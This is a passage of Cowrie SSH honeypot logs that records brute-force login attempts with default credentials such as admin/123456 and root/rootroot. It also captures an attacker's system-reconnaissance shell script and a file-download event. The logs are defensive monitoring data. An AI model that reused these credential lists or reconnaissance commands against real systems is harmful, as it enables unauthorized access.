name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T03:34:46.632329Z","src_ip":"212.227.235.229","session":"3bcd88a7862b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T03:34:46.633352Z","src_ip":"212.227.235.229","session":"3bcd88a7862b"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T03:34:46.634733Z","src_ip":"212.227.235.229","session":"3bcd88a7862b"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T03:34:46.636485Z","src_ip":"212.227.235.229","session":"3bcd88a7862b"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T03:34:46.637340Z","src_ip":"212.227.235.229","session":"3bcd88a7862b"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T03:34:46.639439Z","src_ip":"212.227.235.229","session":"3bcd88a7862b"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T03:34:46.640685Z","src_ip":"212.227.235.229","session":"3bcd88a7862b"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T03:34:46.641320Z","src_ip":"212.227.235.229","session":"3bcd88a7862b"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T03:34:46.641937Z","src_ip":"212.227.235.229","session":"3bcd88a7862b"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T03:34:46.642516Z","src_ip":"212.227.235.229","session":"3bcd88a7862b"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T03:34:46.643370Z","src_ip":"212.227.235.229","session":"3bcd88a7862b"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T03:34:46.643977Z","src_ip":"212.227.235.229","session":"3bcd88a7862b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T03:34:46.850471Z","src_ip":"212.227.235.229","session":"3bcd88a7862b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:34:46.851536Z","src_ip":"212.227.235.229","session":"3bcd88a7862b"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:34:46.852519Z","src_ip":"212.227.235.229","session":"3bcd88a7862b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:34:55.498317Z","src_ip":"212.227.125.160","session":"d67b65cf7cf8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43060,"dst_ip":"1.2.3.4","dst_port":22,"session":"abd1427d4615","protocol":"ssh","message":"New connection: 212.227.235.229:43060 (1.2.3.4:22) [session: abd1427d4615]","sensor":"my-vps","timestamp":"2025-08-31T03:34:58.458176Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:34:59.206871Z","src_ip":"212.227.235.229","session":"abd1427d4615"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:34:59.207551Z","src_ip":"212.227.235.229","session":"abd1427d4615"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":34086,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd6ae8e95a96","protocol":"ssh","message":"New connection: 41.226.27.251:34086 (1.2.3.4:22) [session: bd6ae8e95a96]","sensor":"my-vps","timestamp":"2025-08-31T03:35:04.055480Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:35:04.129892Z","src_ip":"41.226.27.251","session":"bd6ae8e95a96"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:35:04.130718Z","src_ip":"41.226.27.251","session":"bd6ae8e95a96"}
{"eventid":"cowrie.login.success","username":"root","password":"rootroot","message":"login attempt [root/rootroot] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:35:04.327022Z","src_ip":"41.226.27.251","session":"bd6ae8e95a96"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:35:04.868660Z","src_ip":"41.226.27.251","session":"bd6ae8e95a96"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:35:04.869393Z","src_ip":"41.226.27.251","session":"bd6ae8e95a96"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:35:04.918872Z","src_ip":"41.226.27.251","session":"bd6ae8e95a96"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:35:04.919989Z","src_ip":"41.226.27.251","session":"bd6ae8e95a96"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123456","message":"login attempt [hadoop/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:35:05.202893Z","src_ip":"212.227.235.229","session":"abd1427d4615"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:35:07.016067Z","src_ip":"212.227.235.229","session":"abd1427d4615"}
{"eventid":"cowrie.session.closed","duration":"69.2","message":"Connection lost after 69.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:35:13.782650Z","src_ip":"212.227.125.160","session":"d67b65cf7cf8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33386,"dst_ip":"1.2.3.4","dst_port":22,"session":"611e92953890","protocol":"ssh","message":"New connection: 212.227.125.160:33386 (1.2.3.4:22) [session: 611e92953890]","sensor":"my-vps","timestamp":"2025-08-31T03:35:19.736212Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:35:20.287151Z","src_ip":"212.227.125.160","session":"611e92953890"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:35:20.287861Z","src_ip":"212.227.125.160","session":"611e92953890"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123456","message":"login attempt [hadoop/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:35:21.949556Z","src_ip":"212.227.125.160","session":"611e92953890"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54486,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa279bbec812","protocol":"ssh","message":"New connection: 212.227.125.160:54486 (1.2.3.4:22) [session: aa279bbec812]","sensor":"my-vps","timestamp":"2025-08-31T03:35:23.300708Z"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:35:23.437950Z","src_ip":"212.227.125.160","session":"611e92953890"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":35944,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee5a864fa5c9","protocol":"ssh","message":"New connection: 41.226.27.251:35944 (1.2.3.4:22) [session: ee5a864fa5c9]","sensor":"my-vps","timestamp":"2025-08-31T03:35:24.283010Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:35:24.335873Z","src_ip":"41.226.27.251","session":"ee5a864fa5c9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:35:24.336619Z","src_ip":"41.226.27.251","session":"ee5a864fa5c9"}
{"eventid":"cowrie.login.failed","username":"es","password":"es123","message":"login attempt [es/es123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:35:24.535022Z","src_ip":"41.226.27.251","session":"ee5a864fa5c9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:35:25.752023Z","src_ip":"41.226.27.251","session":"ee5a864fa5c9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:35:30.577549Z","src_ip":"212.227.235.229","session":"5df33f2b9971"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:35:32.673493Z","src_ip":"212.227.125.160","session":"aa279bbec812"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:35:32.674301Z","src_ip":"212.227.125.160","session":"aa279bbec812"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57714,"dst_ip":"1.2.3.4","dst_port":22,"session":"049fd1ef41b5","protocol":"ssh","message":"New connection: 212.227.125.160:57714 (1.2.3.4:22) [session: 049fd1ef41b5]","sensor":"my-vps","timestamp":"2025-08-31T03:35:39.715786Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:35:39.716685Z","src_ip":"212.227.125.160","session":"049fd1ef41b5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:35:39.968714Z","src_ip":"212.227.125.160","session":"049fd1ef41b5"}
{"eventid":"cowrie.login.failed","username":"user","password":"p@ssw0rd123","message":"login attempt [user/p@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:35:40.962111Z","src_ip":"212.227.125.160","session":"049fd1ef41b5"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:35:42.211050Z","src_ip":"212.227.125.160","session":"049fd1ef41b5"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":59460,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c1700d0bbb0","protocol":"ssh","message":"New connection: 41.226.27.251:59460 (1.2.3.4:22) [session: 5c1700d0bbb0]","sensor":"my-vps","timestamp":"2025-08-31T03:35:44.250152Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:35:44.290876Z","src_ip":"41.226.27.251","session":"5c1700d0bbb0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:35:44.301127Z","src_ip":"41.226.27.251","session":"5c1700d0bbb0"}
{"eventid":"cowrie.login.failed","username":"sugi","password":"sugi","message":"login attempt [sugi/sugi] failed","sensor":"my-vps","timestamp":"2025-08-31T03:35:44.494883Z","src_ip":"41.226.27.251","session":"5c1700d0bbb0"}
{"eventid":"cowrie.session.closed","duration":"75.4","message":"Connection lost after 75.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:35:44.994193Z","src_ip":"212.227.235.229","session":"5df33f2b9971"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:35:45.708148Z","src_ip":"41.226.27.251","session":"5c1700d0bbb0"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50820,"dst_ip":"1.2.3.4","dst_port":22,"session":"71b70c709df4","protocol":"ssh","message":"New connection: 217.72.205.35:50820 (1.2.3.4:22) [session: 71b70c709df4]","sensor":"my-vps","timestamp":"2025-08-31T03:35:57.398276Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:35:57.400166Z","src_ip":"217.72.205.35","session":"71b70c709df4"}
